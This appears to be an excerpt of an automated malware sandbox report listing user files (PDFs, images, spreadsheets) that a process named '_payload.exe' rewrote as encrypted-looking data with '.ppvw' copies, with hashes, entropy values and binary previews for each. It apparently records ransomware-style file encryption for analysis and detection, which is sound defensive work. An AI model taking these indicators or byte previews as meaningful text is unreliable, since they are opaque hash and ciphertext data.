                                                                                                                          Preview:KZWFN..C/.$.S..;I.....W..^.r..3.^30VP,.y.gA.^~'.`.e..i-/.e..H<...V..4..0].....u..GL..Q...`..gQ)>o.......L......\'.Z.*.[%.....bEm......O...q..q..Y.*u.;.H..eF*...0.....W.R.(.s....2M.....k.!..w....hQ4n..$..m^A.!.+<....X..]...t*..6..ej.F"........L&6....E..X.O.P.....4>..Zq.7..lf..:.$......./2:.....T .7..Q_[OA.h.....yx.Z.9j.. ..B.~T5..J....v...).Z|.Y.Re...94Vq....]...pQI:...Yg.o...q..u...u....Wj.wzA.*.Z8......S.].C.........T...}....p0.nP..|S......K.jv..>.Gf...@..=.8...+.....I.....U....8!o.7....p...h. Rs...~.R...6.}.+X.F.<..p.._A....Mp...<.\....].Sv.BJ)..V.....++...I........=.:.@u+B..[.....:..1.-.....6N.>7&.h.R[u.......m.&.J./.;J.R)T.....|..[....uG7..._...+d\t..J.;...-E...........*......P. .Y.%&.....z.N...p,........q'..:....j.@."..w0..pE..^....@C.....+.M.d._D7..Qw.%..k.X....(:pq%cj*..w.....o.ATn.b....`..B....p..;.;...H...........V\.W.. .f..>,.......oV.x{.9..{...IbH|x.c.... ,...wM.L.......7.h(.n.W..$H.2.......a.....cP..7I.a.D.7....8,..

                                                                                                                          C:\Users\user\Desktop\KZWFNRXYKI.pdf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.828798977516633
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:YbdXPbmvK8boLYKsvB7TIyI4BJa8ZssVX48TzAsni2J/6M4RkLDTbD:ktI4YBZTIyTU8ZssJjTZiKIR6DHD
                                                                                                                          MD5:4D5EC360EB9B912708352EF28FD5DFC3
                                                                                                                          SHA1:62A856949A5185931BC9C3C26A069FC50D823F28
                                                                                                                          SHA-256:65C2D95FFC1789B90B8663C12B347A41AA48FE1D1F24C59751269BC01081D593
                                                                                                                          SHA-512:52E64D252AD2A4D58EFC5FB00915797B228A400D061A02E6E0804B8BC0EB1D3B6579CD1D0747146455E8567B77AC74ADF30628C745F464AF3B2406FDE746AED5
                                                                                                                          Malicious:false
                                                                                                                          Preview:KZWFNWN.Qap.qO.......|..h.7...4.T..7.....H:.I2..|..T{0w!..3...C..n...].tc.c...q..lq....u.f..Zj. ..........+.Wx.h..8....IV8.....05C........k...w6?.T.["9jh..*AP.......|..R...[.5.......%.......o]...)...."H}!?...zW...Y.....l.PH?.2:.9..I...*...<...<.......F...."N.U.5aF\......#/...n-.O..q..#.......iC..tO`{r..*..Jj!..H...?s...<@......D.q....e.S&....j.q..^.z.F.2^.....B.i.y ...$.Ei&.}.y..4......:..........J....%..vD....+... ..Z..q.rD.M.....2..KQ............UCA.\..8..[..g....}O...C....Ex.J.<....gU=.O'....|.^G.....UZ....N...C.....#.*.s..,>...U.....]".{y?.."O..:.n...8.a3.hn..3..#......Z...|...d%|.O+B;...JA..*..}.o.9.....)..JQ#q..F.......u....s.......d4..o.v..g...jT.....g.Il,....9..;....k...d/H...+K...#Y.....`.&.D'..2n...r...G!].@.i."....h.w...XfS..!GXk..pw. erj....Pm]....aIg..!...#h.^'.}[...X.........h..D.V*..i.IY."......R.>..m.{G........N..r....1..F..'._<V..*z.....9..%..<.eH}.]eep..-.n.N....t.hB.c...C.B.n......-..$..... x...%OkS&Y..

                                                                                                                          C:\Users\user\Desktop\KZWFNRXYKI.pdf.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.828798977516633
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:YbdXPbmvK8boLYKsvB7TIyI4BJa8ZssVX48TzAsni2J/6M4RkLDTbD:ktI4YBZTIyTU8ZssJjTZiKIR6DHD
                                                                                                                          MD5:4D5EC360EB9B912708352EF28FD5DFC3
                                                                                                                          SHA1:62A856949A5185931BC9C3C26A069FC50D823F28
                                                                                                                          SHA-256:65C2D95FFC1789B90B8663C12B347A41AA48FE1D1F24C59751269BC01081D593
                                                                                                                          SHA-512:52E64D252AD2A4D58EFC5FB00915797B228A400D061A02E6E0804B8BC0EB1D3B6579CD1D0747146455E8567B77AC74ADF30628C745F464AF3B2406FDE746AED5
                                                                                                                          Malicious:false
                                                                                                                          Preview:KZWFNWN.Qap.qO.......|..h.7...4.T..7.....H:.I2..|..T{0w!..3...C..n...].tc.c...q..lq....u.f..Zj. ..........+.Wx.h..8....IV8.....05C........k...w6?.T.["9jh..*AP.......|..R...[.5.......%.......o]...)...."H}!?...zW...Y.....l.PH?.2:.9..I...*...<...<.......F...."N.U.5aF\......#/...n-.O..q..#.......iC..tO`{r..*..Jj!..H...?s...<@......D.q....e.S&....j.q..^.z.F.2^.....B.i.y ...$.Ei&.}.y..4......:..........J....%..vD....+... ..Z..q.rD.M.....2..KQ............UCA.\..8..[..g....}O...C....Ex.J.<....gU=.O'....|.^G.....UZ....N...C.....#.*.s..,>...U.....]".{y?.."O..:.n...8.a3.hn..3..#......Z...|...d%|.O+B;...JA..*..}.o.9.....)..JQ#q..F.......u....s.......d4..o.v..g...jT.....g.Il,....9..;....k...d/H...+K...#Y.....`.&.D'..2n...r...G!].@.i."....h.w...XfS..!GXk..pw. erj....Pm]....aIg..!...#h.^'.}[...X.........h..D.V*..i.IY."......R.>..m.{G........N..r....1..F..'._<V..*z.....9..%..<.eH}.]eep..-.n.N....t.hB.c...C.B.n......-..$..... x...%OkS&Y..

                                                                                                                          C:\Users\user\Desktop\LTKMYBSEYZ.jpg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.853208754329532
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:L0OccGQz6qz0hewcccekynVGrYtAB80Or4XqC4JcZ3WhDMtAP5lR5ILIBNbD:oOccZz6qohHtcAnS4ABbOrw/4JcZmdMi
                                                                                                                          MD5:AAA37A1F3F3E7D165A2DE8A7EE539F30
                                                                                                                          SHA1:C32560E2593369C6B0A77FBF103DA8FAA986AEEF
                                                                                                                          SHA-256:3418D661289D1A633B5DB5246C16659A172725028CD9119286C5D87AA4CC2205
                                                                                                                          SHA-512:C13B9670B844BA96A7CE5F6822F1673D507CB4894459329C37C131066441D37C9440E8AC9609AF4C5B52E916591B7DE42FB8939D97FA014F746DF667FE6245F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:LTKMY.F&..v".....J.......\.K...7.].2.(...UL.p....{n.j..CY...so......i.i...q..P......sC..m...=.6..d.nh...g.o..i.:..I)|.........zds.W.0..8.t_A.....c.y...=M+........n.....z...@..b...Q.....@Ko..:].1.]..GJ.)..0..0m.-{..n.k.4h.Z.j.?b..@..p.Y...k..7......0..t^...S....F0Un...)]....Q.Ey?..._a...g."..,...g.+i~m..c...}.U.:......!MJ...3/..R....Y..nf..}......iB.8c..^...8.h_...T.p...4.m,H.7....e$...S..m..=o..)5.....ah..q[4xX.....c..|S.H...t.=..e.."x[...u.......Xh%g..........^. p#.0......&%.N....z,.....O..1`.D..e.......H.V..M..V....E.....N.[....~...(..0.....m..=..9m[...T.G..*.H;`..-.....}{.....6./...Fgp#/C.#....I..%.\..E..@h.@.N...q.gl.C..Z@=.lz.G0r8;p.W?S*.Y....[..M.<..&.E)S..6..:...A.C.......].fw?/.....;.0.z....7N.^'.*YV.p...m....T~s=#. x.F.......yj".-p}4ZV.T...._a|!..th..IN....I.Ip..O..q..h .jn....%L...."..*.."..K.....}._.l..6.......96 .p.i.~....j.*.*S.x.....].'.V|..;..(..9*.j6.e..S.#X.m....;.o.].....:&H...g....@..R..P..a.u@4.cX.... ..w.p;a...$o.6.M..

                                                                                                                          C:\Users\user\Desktop\LTKMYBSEYZ.jpg.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.853208754329532
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:L0OccGQz6qz0hewcccekynVGrYtAB80Or4XqC4JcZ3WhDMtAP5lR5ILIBNbD:oOccZz6qohHtcAnS4ABbOrw/4JcZmdMi
                                                                                                                          MD5:AAA37A1F3F3E7D165A2DE8A7EE539F30
                                                                                                                          SHA1:C32560E2593369C6B0A77FBF103DA8FAA986AEEF
                                                                                                                          SHA-256:3418D661289D1A633B5DB5246C16659A172725028CD9119286C5D87AA4CC2205
                                                                                                                          SHA-512:C13B9670B844BA96A7CE5F6822F1673D507CB4894459329C37C131066441D37C9440E8AC9609AF4C5B52E916591B7DE42FB8939D97FA014F746DF667FE6245F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:LTKMY.F&..v".....J.......\.K...7.].2.(...UL.p....{n.j..CY...so......i.i...q..P......sC..m...=.6..d.nh...g.o..i.:..I)|.........zds.W.0..8.t_A.....c.y...=M+........n.....z...@..b...Q.....@Ko..:].1.]..GJ.)..0..0m.-{..n.k.4h.Z.j.?b..@..p.Y...k..7......0..t^...S....F0Un...)]....Q.Ey?..._a...g."..,...g.+i~m..c...}.U.:......!MJ...3/..R....Y..nf..}......iB.8c..^...8.h_...T.p...4.m,H.7....e$...S..m..=o..)5.....ah..q[4xX.....c..|S.H...t.=..e.."x[...u.......Xh%g..........^. p#.0......&%.N....z,.....O..1`.D..e.......H.V..M..V....E.....N.[....~...(..0.....m..=..9m[...T.G..*.H;`..-.....}{.....6./...Fgp#/C.#....I..%.\..E..@h.@.N...q.gl.C..Z@=.lz.G0r8;p.W?S*.Y....[..M.<..&.E)S..6..:...A.C.......].fw?/.....;.0.z....7N.^'.*YV.p...m....T~s=#. x.F.......yj".-p}4ZV.T...._a|!..th..IN....I.Ip..O..q..h .jn....%L...."..*.."..K.....}._.l..6.......96 .p.i.~....j.*.*S.x.....].'.V|..;..(..9*.j6.e..S.#X.m....;.o.].....:&H...g....@..R..P..a.u@4.cX.... ..w.p;a...$o.6.M..

                                                                                                                          C:\Users\user\Desktop\LTKMYBSEYZ.xlsx

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.85509910782397
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:cNXq2VwlQhMe6VdXt5mbmQAuyRhCAGyZbhs6V3euIMRGaHShh/bsNid1uPfm2F4A:cVQlQhMe6VdXt9PRsAFZbm6VUhCNeN2d
                                                                                                                          MD5:47E546988732D63FBC6C1E38F28065E9
                                                                                                                          SHA1:9F14D79943C17412ECA98A4A1D41804EF5134654
                                                                                                                          SHA-256:D362219161CF3EE73A928B80F1FE4805E64A99DE3905AF92D5EFD1174C16663E
                                                                                                                          SHA-512:BD748348D90D7447F8F29099D406004A7EB2E750C34C560CF4A5CBEC73E9003DCA8B4829C54026748BD99F46C122AD2B6BB9B72257AE12FE9382B9F479B673A9
                                                                                                                          Malicious:false
                                                                                                                          Preview:LTKMY-?.~I....B....p.....k%;......{.....8I..M[QGa._.*..@...-].2..mNKLo...;].......Y....r....e..^..L....-).<.V.f..,wz..^w.....};[9U.h.e.#.....k........#....u..."...4.\=q0.xs.....L....O..F.........7p..e...9K.:.8..AM.."\...fZKp...i..siGa.=P....h5By.H=...G.V.=.o.!........_"..Vf...%,..fm.Z...+...|.#H!......+[...P...+..z..8.D.....\8..R.(A.0.Ib.~.nM4X...G...,....<)...v.MMj~%c....y1....g..U@.;..X..10.>.. ..@..o...S".B.Dj.+..B.n0.....2....c..o}RIb.Z.!~...T..jq..9.~.r-.x7..,.%.\.a&G.W...>up...%.u...N..aa..e.b.&..B...h..o...C'..T..E.h.x.>.....,.*..t..[fe.o..y...Tb.tl.:......{.....\..l..lF.Cy..;....b\|p...+L.f.]...i.{....^.U|....%.a.#CL.........Y#.=[.........mJ..A..a..K. \....:.V+...F.'..9....8f.wn57.W2..'..D..{.....Lm......Y..(.f+bX*....\....=.O.......D.X.]...|....R.<.<...rY2..%...-....c[.S$.k....1.....=h.o@....K.g..)A..:.ys....X.....Z..B..LF.%..-.'.. .Rv...4.S...{....K.F...O.Z{$@_..F`..<.0]......+.B.p@....$KuX....~.RELo.6kEH.8....l..k.4.d...

                                                                                                                          C:\Users\user\Desktop\LTKMYBSEYZ.xlsx.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.85509910782397
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:cNXq2VwlQhMe6VdXt5mbmQAuyRhCAGyZbhs6V3euIMRGaHShh/bsNid1uPfm2F4A:cVQlQhMe6VdXt9PRsAFZbm6VUhCNeN2d
                                                                                                                          MD5:47E546988732D63FBC6C1E38F28065E9
                                                                                                                          SHA1:9F14D79943C17412ECA98A4A1D41804EF5134654
                                                                                                                          SHA-256:D362219161CF3EE73A928B80F1FE4805E64A99DE3905AF92D5EFD1174C16663E
                                                                                                                          SHA-512:BD748348D90D7447F8F29099D406004A7EB2E750C34C560CF4A5CBEC73E9003DCA8B4829C54026748BD99F46C122AD2B6BB9B72257AE12FE9382B9F479B673A9
                                                                                                                          Malicious:false
                                                                                                                          Preview:LTKMY-?.~I....B....p.....k%;......{.....8I..M[QGa._.*..@...-].2..mNKLo...;].......Y....r....e..^..L....-).<.V.f..,wz..^w.....};[9U.h.e.#.....k........#....u..."...4.\=q0.xs.....L....O..F.........7p..e...9K.:.8..AM.."\...fZKp...i..siGa.=P....h5By.H=...G.V.=.o.!........_"..Vf...%,..fm.Z...+...|.#H!......+[...P...+..z..8.D.....\8..R.(A.0.Ib.~.nM4X...G...,....<)...v.MMj~%c....y1....g..U@.;..X..10.>.. ..@..o...S".B.Dj.+..B.n0.....2....c..o}RIb.Z.!~...T..jq..9.~.r-.x7..,.%.\.a&G.W...>up...%.u...N..aa..e.b.&..B...h..o...C'..T..E.h.x.>.....,.*..t..[fe.o..y...Tb.tl.:......{.....\..l..lF.Cy..;....b\|p...+L.f.]...i.{....^.U|....%.a.#CL.........Y#.=[.........mJ..A..a..K. \....:.V+...F.'..9....8f.wn57.W2..'..D..{.....Lm......Y..(.f+bX*....\....=.O.......D.X.]...|....R.<.<...rY2..%...-....c[.S$.k....1.....=h.o@....K.g..)A..:.ys....X.....Z..B..LF.%..-.'.. .Rv...4.S...{....K.F...O.Z{$@_..F`..<.0]......+.B.p@....$KuX....~.RELo.6kEH.8....l..k.4.d...

                                                                                                                          C:\Users\user\Desktop\NIKHQAIQAU.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.841698060285894
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:dHXu/PZt9IzmPrgkPFDbE+BI0SWTFti7tIzy+Q6ELUsxVG+bD:Ju/dIzKPFDb/APtma7xM8D
                                                                                                                          MD5:CF966F44436A5E595970E926340883D1
                                                                                                                          SHA1:851DF5743E19D1CE678F4AA368EF1EBFA2A2D1C4
                                                                                                                          SHA-256:0504B13BCAFF54D101A959F4A458A10F319535BEB5307B9C7B546D0B743BC139
                                                                                                                          SHA-512:1D3902D215C24ACD9DFEC88F2F94E18B74A0BC98E89AA71E9A327BB27B21796A15B0FD886CEEF09900EFD1025DD5CBD82435C1A495E3918759F083C9BBD8A91C
                                                                                                                          Malicious:false
                                                                                                                          Preview:NIKHQ....V!.^..R4/..l<T-..M!...3^.5.......z.....>$k.#P0..U.B..b.M..K..-..}....]. >..1......:d..E..}.C(.5..[..46.u..N..;...3N..m.o{('!..q....yH....|.....;U.I.Ns:CI..5..w.?J.......D...|..jlc5..Q{(..Y...kf..P....".+.......q.0:.../VN..mG.$.m.....x..*a.\...O..).XQ.....B+.z.;a.......`.......v....k..L....f......g.w...\Or.......!....Le.......h.i..N.D?.B...R>..';.zZPTj..*F..f../Je6......m..a.3.6O.k...W.M......T.*.....Q..3~.b[>0^i#..gHU.u_v3.N.Q....p..$$...2.f.F..rW...o!.C........^}.......()...c.)...0..0..Sg...6.l....|3cD.....E.g.e5.H.m....j4e.....1..8..QI.......&u.5.>_M....."{....1^.4<.n......&*...g.+..MQc...Y,&..:...%.;...:..W.....L.<.a...2G.......pL.-CV....p.....w...!.h~)....Qs.f.~>....D.A..[..:Q/.L.qI.m... ).. .h.zv.$._....1{D.&i..~.M.....o..#(.K..j...-fu.vn..?. ..'...V.m..X.....:....D[....Q.h.z.RG.Xcgh.b..}...\-......*..e.apC.....'......_(..q......>ag...d.{.....$.).4....$...%`.m....?..#%'j.p.HD.?.1.qO.....!V.nwu...DJ..f.Vh'.6...D..8..$...;...

                                                                                                                          C:\Users\user\Desktop\NIKHQAIQAU.png.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.841698060285894
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:dHXu/PZt9IzmPrgkPFDbE+BI0SWTFti7tIzy+Q6ELUsxVG+bD:Ju/dIzKPFDb/APtma7xM8D
                                                                                                                          MD5:CF966F44436A5E595970E926340883D1
                                                                                                                          SHA1:851DF5743E19D1CE678F4AA368EF1EBFA2A2D1C4
                                                                                                                          SHA-256:0504B13BCAFF54D101A959F4A458A10F319535BEB5307B9C7B546D0B743BC139
                                                                                                                          SHA-512:1D3902D215C24ACD9DFEC88F2F94E18B74A0BC98E89AA71E9A327BB27B21796A15B0FD886CEEF09900EFD1025DD5CBD82435C1A495E3918759F083C9BBD8A91C
                                                                                                                          Malicious:false
                                                                                                                          Preview:NIKHQ....V!.^..R4/..l<T-..M!...3^.5.......z.....>$k.#P0..U.B..b.M..K..-..}....]. >..1......:d..E..}.C(.5..[..46.u..N..;...3N..m.o{('!..q....yH....|.....;U.I.Ns:CI..5..w.?J.......D...|..jlc5..Q{(..Y...kf..P....".+.......q.0:.../VN..mG.$.m.....x..*a.\...O..).XQ.....B+.z.;a.......`.......v....k..L....f......g.w...\Or.......!....Le.......h.i..N.D?.B...R>..';.zZPTj..*F..f../Je6......m..a.3.6O.k...W.M......T.*.....Q..3~.b[>0^i#..gHU.u_v3.N.Q....p..$$...2.f.F..rW...o!.C........^}.......()...c.)...0..0..Sg...6.l....|3cD.....E.g.e5.H.m....j4e.....1..8..QI.......&u.5.>_M....."{....1^.4<.n......&*...g.+..MQc...Y,&..:...%.;...:..W.....L.<.a...2G.......pL.-CV....p.....w...!.h~)....Qs.f.~>....D.A..[..:Q/.L.qI.m... ).. .h.zv.$._....1{D.&i..~.M.....o..#(.K..j...-fu.vn..?. ..'...V.m..X.....:....D[....Q.h.z.RG.Xcgh.b..}...\-......*..e.apC.....'......_(..q......>ag...d.{.....$.).4....$...%`.m....?..#%'j.p.HD.?.1.qO.....!V.nwu...DJ..f.Vh'.6...D..8..$...;...

                                                                                                                          C:\Users\user\Desktop\NWTVCDUMOB.pdf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.860080840490085
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:z3lDCdkqimoXUhGwDhumqKvUlQFmvDM2Dh5iD4pHNMQjB+baqRko/1eHBmHbD:z3lDCdPiLUVDhZbSQwQE/iEVTjBKa6e2
                                                                                                                          MD5:8FC44579DE8C7E114C8009B8B89CA473
                                                                                                                          SHA1:F46B9D569A276B9BD11717C8938715188233F22F
                                                                                                                          SHA-256:CF4B4094B2C36C449940A51F7BFA82135CB4C6B14642084C27F25AECB682632E
                                                                                                                          SHA-512:F2C87477ABE0782BAC14DD02C9985C399CE744E0D3CBF00EC4DD3D20CA83C45A818F0116EF580B8C9D4C024219D1D0228E38ECD990A26C00BE01FE74613D8C07
                                                                                                                          Malicious:true
                                                                                                                          Preview:NWTVC...bj.. ..{H.1.....Wr..{..L..%...,t.{.+.....R(......";.Y.ple."M.m.\..8.%........H..4<o........5...@.c*.R.<m..%...&)zQI<.m.&`...:S....W.k.$.HG...&m..#c.V.y.-N3.u!...v6T..N.2{.)..'qC.........J..$..J...'......w.&.....x~}m...S. .#5(.........K.`N5d/V..Xc.0.....V.....J3.k.h.LG..e...]..d'."..&..........w.~.p".?.;'..^...b*..^$.....*...AV...5.....-.W.7%..,h.w..1...{...\@.....&.9=.. _Z_..BjOB..8.a ....+.W....Q..<...S._H.?..+...-.n..A.%...k..............8CB.{?.C.%I...L..q..c...hd...G....q.....s.g.3....3.+1...t.a.....U.9Qm....!t..2...mKS.........9^x.D.zw...zZ.vyj.Be3.o_.m..z.7..V...._.~.S....>._^,..R.q.o?....i.._...>.=.9..l.{%. ..j.{.....bu..:.m+....B.....Tv..O.....y......X....EcI=.iS.<.|..14ez~N.....n..dX.@>.'. .......M.a...CJ...1#...8....m=.aah..I...+o.*.b...M}.L)'\..5..~zy.......6...5.....h..t.q........;..U...@1....&f.."..,S...I]#.....<.Z!W6o&.j}41;.[.c..D........]...f.K.4..\..2uW._"T....>|.R..8#......Z..z......t...S.....O..~~~.d..j.

                                                                                                                          C:\Users\user\Desktop\NWTVCDUMOB.pdf.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.860080840490085
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:z3lDCdkqimoXUhGwDhumqKvUlQFmvDM2Dh5iD4pHNMQjB+baqRko/1eHBmHbD:z3lDCdPiLUVDhZbSQwQE/iEVTjBKa6e2
                                                                                                                          MD5:8FC44579DE8C7E114C8009B8B89CA473
                                                                                                                          SHA1:F46B9D569A276B9BD11717C8938715188233F22F
                                                                                                                          SHA-256:CF4B4094B2C36C449940A51F7BFA82135CB4C6B14642084C27F25AECB682632E
                                                                                                                          SHA-512:F2C87477ABE0782BAC14DD02C9985C399CE744E0D3CBF00EC4DD3D20CA83C45A818F0116EF580B8C9D4C024219D1D0228E38ECD990A26C00BE01FE74613D8C07
                                                                                                                          Malicious:false
                                                                                                                          Preview:NWTVC...bj.. ..{H.1.....Wr..{..L..%...,t.{.+.....R(......";.Y.ple."M.m.\..8.%........H..4<o........5...@.c*.R.<m..%...&)zQI<.m.&`...:S....W.k.$.HG...&m..#c.V.y.-N3.u!...v6T..N.2{.)..'qC.........J..$..J...'......w.&.....x~}m...S. .#5(.........K.`N5d/V..Xc.0.....V.....J3.k.h.LG..e...]..d'."..&..........w.~.p".?.;'..^...b*..^$.....*...AV...5.....-.W.7%..,h.w..1...{...\@.....&.9=.. _Z_..BjOB..8.a ....+.W....Q..<...S._H.?..+...-.n..A.%...k..............8CB.{?.C.%I...L..q..c...hd...G....q.....s.g.3....3.+1...t.a.....U.9Qm....!t..2...mKS.........9^x.D.zw...zZ.vyj.Be3.o_.m..z.7..V...._.~.S....>._^,..R.q.o?....i.._...>.=.9..l.{%. ..j.{.....bu..:.m+....B.....Tv..O.....y......X....EcI=.iS.<.|..14ez~N.....n..dX.@>.'. .......M.a...CJ...1#...8....m=.aah..I...+o.*.b...M}.L)'\..5..~zy.......6...5.....h..t.q........;..U...@1....&f.."..,S...I]#.....<.Z!W6o&.j}41;.[.c..D........]...f.K.4..\..2uW._"T....>|.R..8#......Z..z......t...S.....O..~~~.d..j.

                                                                                                                          C:\Users\user\Desktop\ONBQCLYSPU\HTAGVDFUIE.pdf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.8354983236886655
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ZvbF0r9QxkEf8PBzhI/xP/k4oXV3Rnog4pX0lga+0hCP1gl47bD:tbEQxEZzKZHJu3ut9GhCtgl2D
                                                                                                                          MD5:ECEF72AFA93950140902E9E5C4E26472
                                                                                                                          SHA1:FA2F427EF704C14ECCC8950BA88FA0172EB475F2
                                                                                                                          SHA-256:A2E3C04B1DBA9E4718402B936C218E251CE14127E39EA651936783E883951BAD
                                                                                                                          SHA-512:DFBB5B38DB96608B8CD0229A713584B031350C41B813FE5EE1DED0449FEC78883EE254128AFEBEFF32A2331B13F3AEA8D92B6DC03D68494CFB2D7C45D1CD0E6C
                                                                                                                          Malicious:false
                                                                                                                          Preview:HTAGVc..[........MW4../#...E.:..q.&5.8.LFt..x8..@.8.q........2.8/$..$.D....e.\e+@.1.Q).......S].:...<D..>>+|K.xx....W.@~.A....2.eA.dgR...4.....sV9.....c.N.V...u.-..p....m...:.Fg...$*...Mg..z..Z..s....XC..}o...e[)}Nj.........x......!1~..!.r.W;.0.'m.'.._.9.X.......O.+4.....Y.1;(....P.x?........5t.?...[..X.U1z...:s8.d ...~.J..y!:E*..K."uM...5..a.|.....8...$.....gt..........q...q.y.f...;......7....|..h..\..g.....<:....9..U!y.`h..1.&..z.......N....#A...VQ..2P!.cdD.K.%w..e...U..."~4....K...'gx200.t......-G..nQo .<?......Y...v...<z.6.]x8-I.1..]..9.i......X.P..x.9;3u.'.hc=..>..)*].x.Y.C....k*G..O.P.....z.....Q.x...Yjm.& ..o6..WW.k+...-..-zm...C\..1.x\*..>..:.&.MP4P.2.....L.n...p..L|..G.t....,....C.).jV.^,u.8n.....:.%...j.'.I+Z$.v...c]..B...z2..|.TF{t.E1....S.`....-...4..=-g.".....n>.4.~o...CY..D.M..n;.xA.f.r"Bc..U...2....,O=.S....Qz......~..|.......\..6...xC~rt.....ld.}..;.....K..4...2....66.:...M.c&'E|.......\'@tX.......|.vsj.q..~..|.......C...

                                                                                                                          C:\Users\user\Desktop\ONBQCLYSPU\HTAGVDFUIE.pdf.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.8354983236886655
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ZvbF0r9QxkEf8PBzhI/xP/k4oXV3Rnog4pX0lga+0hCP1gl47bD:tbEQxEZzKZHJu3ut9GhCtgl2D
                                                                                                                          MD5:ECEF72AFA93950140902E9E5C4E26472
                                                                                                                          SHA1:FA2F427EF704C14ECCC8950BA88FA0172EB475F2
                                                                                                                          SHA-256:A2E3C04B1DBA9E4718402B936C218E251CE14127E39EA651936783E883951BAD
                                                                                                                          SHA-512:DFBB5B38DB96608B8CD0229A713584B031350C41B813FE5EE1DED0449FEC78883EE254128AFEBEFF32A2331B13F3AEA8D92B6DC03D68494CFB2D7C45D1CD0E6C
                                                                                                                          Malicious:false
